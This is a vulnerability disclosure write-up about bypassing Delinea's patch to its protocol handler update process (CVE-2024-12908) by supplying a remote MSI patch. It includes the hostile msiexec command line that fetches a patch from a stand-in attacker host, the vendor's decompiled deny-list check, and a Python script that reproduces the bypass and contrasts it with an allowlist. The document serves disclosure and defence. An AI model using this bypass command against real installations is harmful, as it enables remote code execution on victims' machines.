Delinea Protocol Handler - MSI Strikes Back

Introduction

Delinea’s custom URL handler can trigger the software’s update process, which downloads an update from an arbitrary location and runs an MSI from it. The update must be a zip archive with a particular file and folder layout, and the MSI is launched by a command in an adjacent setup.bat file. The MSI’s signature is checked to prove legitimacy, and the installation is abandoned if that check fails.

We originally found a vulnerability in this process last year, described in Delinea Protocol Handler - Remote Code Execution via Update Process (CVE-2024-12908), which you might want to read to refresh your memory. We thought we’d take a look at how the patch worked and see if we could bypass it.

Re-Exploiting the Vulnerability

Our previous exploit leveraged the TRANSFORMS argument to msiexec.exe to modify the MSI tables at runtime and achieve code execution. The exploit used a command similar to the following in the update archive’s setup.bat file:

msiexec /i msi\SSProtocolHandler.msi TRANSFORMS="delinea.mst"

Analysis of the patched version of RDPWin.Bootstrapper.exe, the file triggered by the URL handler, showed that an additional check for the word TRANSFORMS in the msiexec.exe command line had been implemented:

if (flag4)
{
    // Extract the downloaded update archive into a fresh temp directory
    text5 = Path.Combine(tempPath, Guid.NewGuid().ToString());
    ZipFile.ExtractToDirectory(newVersionMsi, text5);
    IEnumerable<string> enumerable = File.ReadLines(Path.Combine(text5, "SSProtocolHandler", "setup.bat"));
    bool flag5 = false; // set if any line contains "TRANSFORMS" (case-insensitive)
    bool flag6 = false; // set if any line contains a character above U+007F
    bool flag7 = false; // set once the first line has been captured in text6
    foreach (string text7 in enumerable)
    {
        if (!flag7)
        {
            flag7 = true;
            text6 = text7;
        }
        flag5 |= (text7.IndexOf("TRANSFORMS", StringComparison.OrdinalIgnoreCase) != -1);
        flag6 |= text7.Any((char c) => c > '\u007f');
    }
    // The first line must start with the expected msiexec command (ordinal match),
    // must not contain '&', and neither deny-list flag may be set
    if (string.IsNullOrWhiteSpace(text6) || !text6.StartsWith("msiexec /i msi\\SSProtocolHandler.msi", StringComparison.Ordinal) || text6.Contains("&") || flag5 || flag6)
    {
        Program.Log.Error("Invalid batch file command in downloaded update: " + text6);
        IoC.Resolve<IMessageBox>().Show("The Secret Server Launcher failed to load.\n\nAuto-update is enabled, but the downloaded update batch file is invalid. You may be the victim of a phishing attack.", "Invalid Update Downloaded", MessageBoxButtons.OK, MessageBoxIcon.Hand);
        return;
    }
    text8 = Path.Combine(text5, "SSProtocolHandler", "msi", "SSProtocolHandler.msi");
}

The interesting lines are isolated below. A boolean flag is set if any line of setup.bat contains the word TRANSFORMS (case-insensitive), and another if any line contains a character above U+007F, the latter to counter WorstFit-style attacks that smuggle characters through Windows best-fit conversion. The first line must also start with the expected msiexec command and must not contain an &. If any of these conditions is not met, the update process is abandoned.

flag5 |= (text7.IndexOf("TRANSFORMS", StringComparison.OrdinalIgnoreCase) != -1);
flag6 |= text7.Any((char c) => c > '\u007f');

Although this check does prevent a transform from being added to the command line, msiexec.exe also accepts a PATCH argument referencing a .msp file, which applies a patch to the MSI at installation time - for example:

msiexec.exe /i installer.msi PATCH=patch.msp

A subtle difference between a transform and a patch is that signature checks can be performed against an MSP file. In this instance, however, the Delinea protocol handler only validates the signature of the MSI itself and performs no check on the patch, making it possible to supply a PATCH argument that modifies the MSI at install time.

Msiexec.exe can also retrieve a patch from a web server, and the PATCH argument does not require a particular file extension, so the command in setup.bat can be changed to:

msiexec /i msi\SSProtocolHandler.msi PATCH=https://attacker.com/patch.txt

When this command is included in the zip file downloaded by the URL handler, msiexec downloads patch.txt and applies it to SSProtocolHandler.msi at install time, giving code execution. Because the command still begins with the expected msiexec /i msi\SSProtocolHandler.msi prefix and contains neither TRANSFORMS, an & nor any non-ASCII character, it passes every check in the patched bootstrapper.
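To make the bypass concrete, the following added example (ours, not Delinea’s code) re-implements the setup.bat checks from the decompiled bootstrapper above in Python, builds a constructed update archive with the expected SSProtocolHandler/setup.bat and SSProtocolHandler/msi/SSProtocolHandler.msi layout, and runs the check over the legitimate command, the original TRANSFORMS exploit and the PATCH bypass. It also contrasts the deny-list with an exact-match allowlist, hardened_check, which is our suggestion and an assumption of this example rather than Delinea’s fix. The MSI bytes and the attacker URL are placeholders; the real archive carries the vendor-signed MSI and no signature check is modelled here.

```python
"""Constructed re-implementation of the patched setup.bat validation.

Mirrors the decompiled logic quoted in the article (expected-prefix, '&',
TRANSFORMS and non-ASCII checks) and contrasts it with an allowlist.
Not Delinea's code; hardened_check is an illustrative assumption.
"""
import io
import os
import tempfile
import zipfile

# Prefix the bootstrapper requires on the first line (ordinal match)
EXPECTED_CMD = "msiexec /i msi\\SSProtocolHandler.msi"

# Constructed setup.bat contents for the three cases discussed in the article
LEGIT = EXPECTED_CMD + "\r\n"
TRANSFORMS_EXPLOIT = EXPECTED_CMD + ' TRANSFORMS="delinea.mst"\r\n'
PATCH_BYPASS = EXPECTED_CMD + " PATCH=https://attacker.com/patch.txt\r\n"


def patched_check(lines):
    """Deny-list check as in the patched bootstrapper (flag5/flag6 logic)."""
    first = None
    has_transforms = False   # flag5
    has_non_ascii = False    # flag6
    for line in lines:
        if first is None:    # flag7: capture the first line as text6
            first = line
        has_transforms |= "transforms" in line.lower()          # OrdinalIgnoreCase
        has_non_ascii |= any(ord(c) > 0x7F for c in line)       # c > '\u007f'
    if first is None or not first.strip():
        return False
    if not first.startswith(EXPECTED_CMD):                      # StringComparison.Ordinal
        return False
    if "&" in first or has_transforms or has_non_ascii:
        return False
    return True


def hardened_check(lines):
    """Allowlist (assumption of this example): the batch file may contain
    exactly the expected command and nothing else, so any extra msiexec
    property such as PATCH=... or TRANSFORMS=... is rejected."""
    non_blank = [line.rstrip("\r") for line in lines if line.strip()]
    return non_blank == [EXPECTED_CMD]


def build_update_zip(setup_bat_text):
    """Constructed update archive with the layout the bootstrapper expects."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("SSProtocolHandler/setup.bat", setup_bat_text)
        # Placeholder bytes: the real archive carries the vendor-signed MSI.
        zf.writestr("SSProtocolHandler/msi/SSProtocolHandler.msi", b"MSI-PLACEHOLDER")
    return buf.getvalue()


def validate_update(zip_bytes, check):
    """Extract to a fresh directory (as the bootstrapper does) and run
    `check` over the lines of SSProtocolHandler/setup.bat."""
    with tempfile.TemporaryDirectory() as tmp:
        with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
            zf.extractall(tmp)
        bat = os.path.join(tmp, "SSProtocolHandler", "setup.bat")
        with open(bat, encoding="utf-8") as fh:
            lines = fh.read().splitlines()
    return check(lines)


if __name__ == "__main__":
    for name, bat in [("legit", LEGIT),
                      ("transforms", TRANSFORMS_EXPLOIT),
                      ("patch", PATCH_BYPASS)]:
        z = build_update_zip(bat)
        print(f"{name:11} patched_check={validate_update(z, patched_check)!s:5} "
              f"hardened_check={validate_update(z, hardened_check)}")
```

Run stand-alone, the script shows the deny-list rejecting the TRANSFORMS command but accepting the PATCH command, while the allowlist rejects both and accepts only the exact expected command. The general point is that filtering known-bad msiexec properties will keep missing variants; only an exact match against the single command the updater is supposed to run, or validating the patch itself, closes the class.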

The video below shows the exploit in action: the victim triggers the URL handler and is served a signed update alongside a setup.bat file whose msiexec command carries a PATCH argument.

Delinea’s Response

  • This was reported to Delinea on 7th March 2025.
  • Delinea have released a patched version of the Protocol Handler (6.0.3.38) that prevents MSI patches from being specified, tracked under the original CVE-2024-12908 advisory.
  • This is detailed in the release notes for Secret Server, under ticket number 649210 in the Secret Server Cloud Change Log.
